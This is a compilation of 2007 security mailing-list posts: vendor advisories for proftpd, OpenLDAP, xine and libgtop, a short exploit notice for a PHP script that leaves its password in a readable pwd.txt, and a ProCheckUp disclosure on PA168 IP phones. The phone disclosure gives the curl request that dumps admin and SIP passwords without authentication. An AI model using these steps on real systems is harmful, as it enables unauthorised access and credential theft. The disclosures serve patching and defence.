[ MDKSA-2006:217-2 ] - Updated proftpd packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:217-2 http://www.mandriva.com/security/ ___ Package : proftpd Date: January 23, 2007 Affected: Corporate 3.0 ___ Problem Description: A stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier, allows remote attackers to cause a denial of service, as demonstrated by vd_proftpd.pm, a ProFTPD remote exploit. (CVE-2006-5815) Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815. (CVE-2006-6170) ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from an initial vague disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability. (CVE-2006-6171) Packages have been patched to correct these issues. Update: The update for the Corporate 3.0 platforms had a bad patch for CVE-2006-5815, which prevented some clients from being able to use the server. This update corrects this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5815 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6170 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171 ___ Updated Packages: Corporate 3.0: 98a60448e690842a0afe6cb50925ceeb corporate/3.0/i586/proftpd-1.2.9-3.7.C30mdk.i586.rpm 9aee5e7d355fa8b730a79f4a58df corporate/3.0/i586/proftpd-anonymous-1.2.9-3.7.C30mdk.i586.rpm 1cf5d2e63700ee924b0346bdd72505d9 corporate/3.0/SRPMS/proftpd-1.2.9-3.7.C30mdk.src.rpm Corporate 3.0/X86_64: a3baa6cdea37f84a99c24b4c3c681ca6 corporate/3.0/x86_64/proftpd-1.2.9-3.7.C30mdk.x86_64.rpm de981e7a4a3eec5371a31079c50d5c17 corporate/3.0/x86_64/proftpd-anonymous-1.2.9-3.7.C30mdk.x86_64.rpm 1cf5d2e63700ee924b0346bdd72505d9 corporate/3.0/SRPMS/proftpd-1.2.9-3.7.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFtmozmqjQ0CJFipgRAhtpAKCWjInDTsN+klJssg25l46lYy3TGwCgrFLL eC5oR5Z7A0UFcICGSPfmnJo= =/+m9 -END PGP SIGNATURE-
RANDOM PHP QUOTE 1.0 (pwd.txt) Remote Password Disclosur
# #RANDOM PHP QUOTE 1.0 (pwd.txt) Remote Password Disclosur # # #scrip : http://www.scriptsez.net/download/download.php?action=downloadp=random_php_quote.zipns=1 # # #discovered by : ThE TiGeR 100 # # #Exploit : # #http://www.site.com/[path]/pwd.txt #or #http://www.site.com/pwd.txt # #then crack the password with bass64 decode # # #Contact:[EMAIL PROTECTED] # # #GreetZ to str0k ;) # # Your Time is UpMy Time Is Now, # You Can't See Me My Time Is Now #
[ GLSA 200701-19 ] OpenLDAP: Insecure usage of /tmp during installation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200701-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: OpenLDAP: Insecure usage of /tmp during installation Date: January 23, 2007 Bugs: #159508 ID: 200701-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A shell script commonly released with OpenLDAP makes insecure usage of files in /tmp during the emerge process. Background == OpenLDAP Software is an open source implementation of the Lightweight Directory Access Protocol. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-nds/openldap 2.1.30-r10 = 2.1.30-r10 = 2.2.28-r7 = 2.3.30-r2 net-nds/openldap 2.2.28-r7 = 2.1.30-r10 = 2.2.28-r7 = 2.3.30-r2 net-nds/openldap 2.3.30-r2 = 2.1.30-r10 = 2.2.28-r7 = 2.3.30-r2 Description === Tavis Ormandy of the Gentoo Linux Security Team has discovered that the file gencert.sh distributed with the Gentoo ebuild for OpenLDAP does not exit upon the existence of a directory in /tmp during installation allowing for directory traversal. Impact == A local attacker could create a symbolic link in /tmp and potentially overwrite arbitrary system files upon a privileged user emerging OpenLDAP. Workaround == There is no known workaround at this time. Resolution == All OpenLDAP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose net-nds/openldap Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200701-19.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp6d8a3JWcbm.pgp Description: PGP signature
PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability
PR06-14: IP Phones based on Centrality Communications/Aredfox PA168
chipset weak session management vulnerability
This advisory has been published following consultation with UK NISCC
[http://www.niscc.gov.uk/]
Date Found: 3rd November 2006
Date Public: 22nd January 2007
Vulnerable:
Phones confirmed to be vulnerable:
- ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54
- SOYO G668 Ethernet IP Phone running SIP firmware version v1.42
The following vendors/models also use the same PA168 chipset/firmware
and are therefore most likely to be vulnerable to the same issue:
- AriaVoice
- AT-323 from ATcom
- JR168_100B from IPLink
- JR168_100W from IPLink
- JR168_200 from IPLink
- Netweb-401/402 from NetWebGroup
- OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based
- Vida some phones PA168 based
- Wuchuan HOP-1001/1002/1003
- Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150
(PA168S chipset)
- GNET some phones PA168x based
- KE1020 Netphone (Meritline)
- ML210 Meritline
- Integrated Networks IN-1002. Found on eBay.
- ArtDio IPF-2000 and IPF-2002L phones
- Perfectone IP300
Severity: Medium
Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp
CVE Candidate: Not assigned
Overview:
There is a problem with the way IP Phones using the PA168 chipset handle
authenticated sessions, allowing remote attackers to gain access to the
admin web console running as superuser.
Description:
When the superuser account authenticates to the admin web console, a
request such as the following is sent to the IP phone's web server:
POST /a HTTP/1.1
Referer: http://192.168.1.100/
Host: 192.168.1.100
Content-Length: 31
auth=12345678login=+++Login+++
At this point, the superuser session is considered *active* by the web
server. All it takes for attackers to perform an administrative task at
this point, is for them to send a well-formed request to the web server.
Since no authentication tokens or password are submitted within the HTTP
requests, anyone can perform administrative tasks while the session is
active. Even if the attacker sends the administrative requests from an
IP address different to the one used by the superuser account, the IP
Phone's web server would accept them as long as the superuser's session
is still active.
A script called active-session-attack.sh has been created, which
remotely checks repeatedly until a superuser account has logged on by
sending a forged superuser request every five seconds. As soon as the
superuser session becomes active, the following information will be
obtained from the settings page, and emailed to the attacker:
- IP phone's superuser password - grants administrative access
- IP phone's user password - grants restricted access
- SIP gateway hostname/IP address
- SIP account username
- SIP account PIN number
REQUEST:
POST /g HTTP/1.1
Host: 192.168.1.100
Content-Length: 13
back=++Back++
RESPONSE (output has been partially omitted for clarification):
HTTP/1.1 200 OK
Content-Length: 16727
Content-Type: text/html
Connection: close
TITLEIP Phone V1.54/TITLE
[output omitted]
INPUT name=sipproxy value=sip.test.com
INPUT name=domain value=sip.test.com
INPUT name=account value=myaccount size=24 maxlength=32
INPUT name=pin type=password value=1234
INPUT name=superpassword type=password value=12345678
INPUT name=password type=password value=1234
[output omitted]
In order to test this vulnerability, the following steps have been provided:
1. Log into http://192.168.1.100 from computer A using the superuser
password ('12345678' by default)
2. Send the following curl command from computer B:
curl -d back=++Back++ http://192.168.1.100/g
3. The administrative settings page should be returned without any
password required.
Note: the IP phone's web server is enabled by default
Fix:
Use access control lists on routers or firewalls in order to only allow
trusted IP addresses to access ATCOM AT-320ED IP Phone's web server.
Exposing the PA168-based IP Phone's admin web server on the Internet is
not recommended.
References:
http://www.voip-info.org/wiki/view/PA168
http://www.centralitycomm.com/
http://www.aredfox.com/eindex.htm
http://www.atcom.cn/En_products_At320ED.html
http://www.soyogroup.com/products/proddesc.php?id=307
http://www.procheckup.com/Vulner_2007.php
Legal:
Copyright 2006 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL
[http://www.procheckup.com/Vulner_PR0614.php], and provided such
reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party.
ProCheckUp is not responsible for the content of external Internet sites.
SUSE Security Announcement: xine (SUSE-SA:2007:013)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:xine-ui,xine-lib,xine-extra,xine-devel Announcement ID:SUSE-SA:2007:013 Date: Tue, 23 Jan 2007 08:00:00 + Affected Products: SUSE LINUX 9.3 SUSE LINUX 10.0 SUSE LINUX 10.1 openSUSE 10.2 SUSE SLED 10 SLE SDK 10 Vulnerability Type: remote code execution Severity (1-10):4 SUSE Default Package: no Cross-References: CVE-2007-0017 Content of This Advisory: 1) Security Vulnerability Resolved: format string bug Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion This update fixes several format string bugs that can be exploited remotely with user-assistance to execute arbitrary code. Since SUSE Linux version 10.1 format string bugs are not exploitable anymore. (CVE-2007-0017) 2) Solution or Work-Around No temporary work-around known. 3) Special Instructions and Notes none 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-devel-1.1.2-40.1.i586.rpm 2cacbb4f4e177362149518481480165a ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-extra-1.1.2-40.1.i586.rpm 73cbdd8d443596547875804bd8e2ca8f ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-lib-1.1.2-40.1.i586.rpm 2114f7c6a4c8351adab588c173419778 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/xine-ui-0.99.4-84.1.i586.rpm 5d4dd945a812ba0b17619c267ec8f2b5 SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/xine-extra-1.1.1-24.17.i586.rpm 3eb1465401e5e1c6f36d8e2d7ca3e114 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/xine-lib-1.1.1-24.17.i586.rpm e2fbf53b629e835dbc2558e87fabf926 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/xine-ui-0.99.4-32.14.i586.rpm d710db4b4d20f7ea4485d16845cb4be2 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xine-extra-1.1.0-0.1.i586.rpm 06753ebd3608223077c95c01f8bc3122 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xine-lib-1.1.0-0.1.i586.rpm 60ab4fd7c193d687d9484e5691aa3f01 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xine-ui-0.99.4-84.1.i586.rpm 4bc3f28d7e600fbb78c65f6b0dcfc436 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/xine-lib-1.0-10.14.i586.rpm c944ed72f913771f0c2300883573e111 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/xine-ui-1.0-10.14.i586.rpm cee2a8a9669b429dde4e465e83aae70f Power PC Platform: openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/xine-lib-1.1.2-40.1.ppc.rpm a1fcfa82deed685446a213439639a579 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/xine-ui-0.99.4-84.1.ppc.rpm bc2dcf2266dbb56b1a0291209aad2dd7 SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/xine-extra-1.1.1-24.17.ppc.rpm c337440571123263478dd2a64059a4e8 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/xine-lib-1.1.1-24.17.ppc.rpm 3cf476901522d7b5abd5bf3cb18484a9 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/xine-ui-0.99.4-32.14.ppc.rpm a9e762bad246963a7564c1f36a5f0392 SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xine-extra-1.1.0-0.1.ppc.rpm 930dc314de3ab49a8655e6cdb89ff50d ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xine-lib-1.1.0-0.1.ppc.rpm ddd255708abfb433a3497d790491be55 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xine-ui-0.99.4-84.1.ppc.rpm 827125d558472b685f0f1843d0eb3850
[ GLSA 200701-17 ] libgtop: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200701-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libgtop: Privilege escalation Date: January 23, 2007 Bugs: #162169 ID: 200701-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis libgtop improperly handles filenames, possibly allowing for the execution of arbitrary code. Background == libgtop facilitates the libgtop_daemon, which is used by GNOME to obtain information about remote systems. Affected packages = --- Package / Vulnerable / Unaffected --- 1 gnome-base/libgtop 2.14.6= 2.14.6 Description === Liu Qishuai discovered that glibtop_get_proc_map_s() in sysdeps/linux/procmap.c does not properly allocate memory for storing a filename, allowing certain filenames to cause the buffer to overflow on the stack. Impact == By tricking a victim into executing an application that uses the libgtop library (e.g. libgtop_daemon or gnome-system-monitor), a local attacker could specify a specially crafted filename to be used by libgtop causing a buffer overflow and possibly execute arbitrary code with the rights of the user running the application. Workaround == There is no known workaround at this time. Resolution == All libgtop users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =gnome-base/libgtop-2.14.6 References == [ 1 ] CVE-2007-0235 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200701-17.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
